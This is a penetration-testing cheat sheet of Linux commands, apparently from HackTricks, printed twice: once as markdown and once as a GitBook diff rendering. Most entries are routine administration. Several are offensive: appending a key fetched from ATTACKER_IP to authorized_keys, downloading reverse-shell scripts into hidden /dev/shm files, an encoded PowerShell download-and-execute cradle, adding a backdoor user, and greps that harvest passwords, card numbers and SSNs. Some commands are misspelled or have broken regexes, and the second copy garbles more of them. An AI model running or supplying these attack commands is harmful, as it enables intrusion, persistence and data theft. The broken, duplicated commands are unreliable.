hacktricks/linux-unix/useful-linux-commands/README.md

# Useful Linux Commands

## Common Bash

```bash
#Exfiltration using Base64
base64 -w 0 file

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'

#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys

#Echo without new line and Hex
echo -n -e

#Count
wc -l <file> #Lines
wc -c #Chars

#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates

#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file

#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py

#Files used by network processes
lsof -i #Files uses by networks processes
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80

#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz

#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker  

#Clipboard
xclip -sel c < cat file.txt

#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob

#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd

## ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101

## Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
## If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz

#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"

##Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -ls 2>/dev/null

#Reconfigure timezone
sudo dpkg-reconfigure tzdata

#Search from wich package is a binary
apt-file search /usr/bin/file #Needed: apt-get install apt-file
```

## Bash for Windows

```bash
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
 
#Exe compression
upx -9 nc.exe

#Exe2bat
wine exe2bat.exe nc.exe nc.txt

#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853  
python pyinstaller.py --onefile exploit.py

#Compile for windows
i586-mingw32msvc-gcc -o executable useradd.c
```

## Greps

```bash
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt

#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

#Extract passwords
grep -i "pwd\|passw" file.txt

#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt

## Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
#Extract valid MySQL-Old hashes
grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
#Extract blowfish hashes
grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
#Extract Joomla hashes
egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
#Extract VBulletin hashes
egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
#Extraxt phpBB3-MD5
egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
#Extract Wordpress-MD5
egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
#Extract Drupal 7
egrep -o '$S$S{52}' *.txt > drupal-7.txt
#Extract old Unix-md5
egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
#Extract md5-apr1
egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
#Extract sha512crypt, SHA512(Unix)
egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt

#Extract e-mails from text files
grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt

#Extract HTTP URLs from text files
grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL format use
grep -E '(((https|ftp|gopher)|mailto)[.:][^ >"	]*|www.[-a-z0-9.]+)[^ .,;	>">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"

#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt

## Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club
grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt

## Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numberss
grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
```

## Nmap search help

```bash
#Nmap scripts ((default or version) and smb))
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb)"
```

## Bash

```bash
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```

## Iptables

```bash
#Delete curent rules and chains
iptables --flush
iptables --delete-chain

#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP

#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT

#default policies
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# Useful Linux Commands`

			`## Common Bash`

			```bash
			`#Exfiltration using Base64`
			`base64 -w 0 file`

			`#Get HexDump without new lines`
			`xxd -p boot12.bin \| tr -d '\n'`

			`#Add public key to authorized keys`
			`curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys`

			`#Echo without new line and Hex`
			`echo -n -e`

			`#Count`
			`wc -l <file> #Lines`
			`wc -c #Chars`

			`#Sort`
			`sort -nr #Sort by number and then reverse`
			`cat file \| sort \| uniq #Sort and delete duplicates`

			`#Replace in file`
			`sed -i 's/OLD/NEW/g' path/file #Replace string inside a file`

			`#Download in RAM`
			`wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py`
			`wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm`
			`curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py`

			`#Files used by network processes`
			`lsof -i #Files uses by networks processes`
			`lsof -i :80 #Files uses by networks processes`
			`fuser -nv tcp 80`

			`#Decompress`
			`tar -xvzf /path/to/yourfile.tgz`
			`tar -xvjf /path/to/yourfile.tbz`
			`bzip2 -d /path/to/yourfile.bz2`
			`tar jxf file.tar.bz2`
			`gunzip /path/to/yourfile.gz`
			`unzip file.zip`
			`7z -x file.7z`
			`sudo apt-get install xz-utils; unxz file.xz`

			`#Add new user`
			`useradd -p 'openssl passwd -1 <Password>' hacker`

			`#Clipboard`
			`xclip -sel c < cat file.txt`

			`#HTTP servers`
			`python -m SimpleHTTPServer 80`
			`python3 -m http.server`
			`ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"`
			`php -S $ip:80`

			`##Curl`
			`#json data`
			`curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint`
			`#Auth via JWT`
			`curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint`

			`#Send Email`
			`sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content`

			`#DD copy hex bin file without first X (28) bytes`
			`dd if=file.bin bs=28 skip=1 of=blob`

			`#Mount .vhd files (virtual hard drive)`
			`sudo apt-get install libguestfs-tools`
			`guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd`

			`## ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys`
			`ssh-keyscan 10.10.10.101`

			`## Openssl`
			`openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server`
			`openssl x509 -in ca.cert.pem -text #Read certificate`
			`openssl genrsa -out newuser.key 2048 #Create new RSA2048 key`
			`openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)`
			`openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate`
			`openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate`
			`openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)`
			`## If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:`
			`openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12`
			`# Decrypt ssh key`
			`openssl rsa -in key.ssh.enc -out key.ssh`
			`#Decrypt`
			`openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz`

			`#Count number of instructions executed by a program, need a host based linux (not working in VM)`
			`perf stat -x, -e instructions:u "ls"`

			`##Find trick for HTB, find files from 2018-12-12 to 2018-12-14`
			`find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -ls 2>/dev/null`

			`#Reconfigure timezone`
			`sudo dpkg-reconfigure tzdata`

			`#Search from wich package is a binary`
			`apt-file search /usr/bin/file #Needed: apt-get install apt-file`
			```

			`## Bash for Windows`

			```bash
			`#Base64 for Windows`
			`echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" \| iconv --to-code UTF-16LE \| base64 -w0`

			`#Exe compression`
			`upx -9 nc.exe`

			`#Exe2bat`
			`wine exe2bat.exe nc.exe nc.txt`

			`#Compile Windows python exploit to exe`
			`pip install pyinstaller`
			`wget -O exploit.py http://www.exploit-db.com/download/31853`
			`python pyinstaller.py --onefile exploit.py`

			`#Compile for windows`
			`i586-mingw32msvc-gcc -o executable useradd.c`
			```

			`## Greps`

			```bash
			`#Extract emails from file`
			`grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt`

			`#Extract valid IP addresses`
			`grep -E -o "(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)" file.txt`

			`#Extract passwords`
			`grep -i "pwd\\|passw" file.txt`

			`#Extract users`
			`grep -i "user\\|invalid\\|authentication\\|login" file.txt`

			`## Extract hashes`
			`#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})`
			`egrep -oE '(^\|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]\|$)' *.txt \| egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt`
			`#Extract valid MySQL-Old hashes`
			`grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt`
			`#Extract blowfish hashes`
			`grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt`
			`#Extract Joomla hashes`
			`egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt`
			`#Extract VBulletin hashes`
			`egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt`
			`#Extraxt phpBB3-MD5`
			`egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt`
			`#Extract Wordpress-MD5`
			`egrep -o '$P$S{31}' *.txt > wordpress-md5.txt`
			`#Extract Drupal 7`
			`egrep -o '$S$S{52}' *.txt > drupal-7.txt`
			`#Extract old Unix-md5`
			`egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt`
			`#Extract md5-apr1`
			`egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt`
			`#Extract sha512crypt, SHA512(Unix)`
			`egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt`

			`#Extract e-mails from text files`
			`grep -E -o "\b[a-zA-Z0-9.#?$_-]+@[a-zA-Z0-9.#?$_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt`

			`#Extract HTTP URLs from text files`
			`grep http \| grep -shoP 'http.?[" >]' .txt > http-urls.txt`
			`#For extracting HTTPS, FTP and other URL format use`
			`grep -E '(((https\|ftp\|gopher)\|mailto)[.:][^ >" ]\|www.[-a-z0-9.]+)[^ .,; >">):]' .txt > urls.txt`
			`#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < .log \| grep -E "Your_Regex" OR # cat -v .log \| egrep -o "Your_Regex"`

			`#Extract Floating point numbers`
			`grep -E -o "^[-+]?[0-9].?[0-9]+([eE][-+]?[0-9]+)?$" .txt > floats.txt`

			`## Extract credit card data`
			`#Visa`
			`grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt`
			`#MasterCard`
			`grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt`
			`#American Express`
			`grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt`
			`#Diners Club`
			`grep -E -o "\b3(?:0[0-5]\|[68][0-9])[0-9]{11}\b" *.txt > diners.txt`
			`#Discover`
			`grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt`
			`#JCB`
			`grep -E -o "\b(?:2131\|1800\|35d{3})d{11}\b" *.txt > jcb.txt`
			`#AMEX`
			`grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt`

			`## Extract IDs`
			`#Extract Social Security Number (SSN)`
			`grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt`
			`#Extract Indiana Driver License Number`
			`grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt`
			`#Extract US Passport Cards`
			`grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt`
			`#Extract US Passport Number`
			`grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt`
			`#Extract US Phone Numberss`
			`grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt`
			`#Extract ISBN Numbers`
			`egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$\|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$\|97[89][0-9]{10}$\|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt`
			```

			`## Nmap search help`

			```bash
			`#Nmap scripts ((default or version) and smb))`
			`nmap --script-help "(default or version) and smb"`
			`locate -r '\.nse$' \| xargs grep categories \| grep 'default\\|version\\|safe' \| grep smb`
			`nmap --script-help "(default or version) and smb)"`
			```

			`## Bash`

			```bash
			`#All bytes inside a file (except 0x20 and 0x00)`
			`for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) \| sort \| grep -v "20\\|00"); do echo -n -e "\x$j" >> bytes; done`
			```

			`## Iptables`

			```bash
			`#Delete curent rules and chains`
			`iptables --flush`
			`iptables --delete-chain`

			`#allow loopback`
			`iptables -A INPUT -i lo -j ACCEPT`
			`iptables -A OUTPUT -o lo -j ACCEPT`

			`#drop ICMP`
			`iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP`
			`iptables -A OUTPUT -p icmp -j DROP`

			`#allow established connections`
			`iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT`

			`#allow ssh, http, https, dns`
			`iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT`
			`iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT`
			`iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT`
			`iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT`
			`iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT`
			`iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT`
			`iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT`

			`#default policies`
			`iptables -P INPUT DROP`
			`iptables -P FORWARD ACCEPT`
			`iptables -P OUTPUT ACCEPT`
			```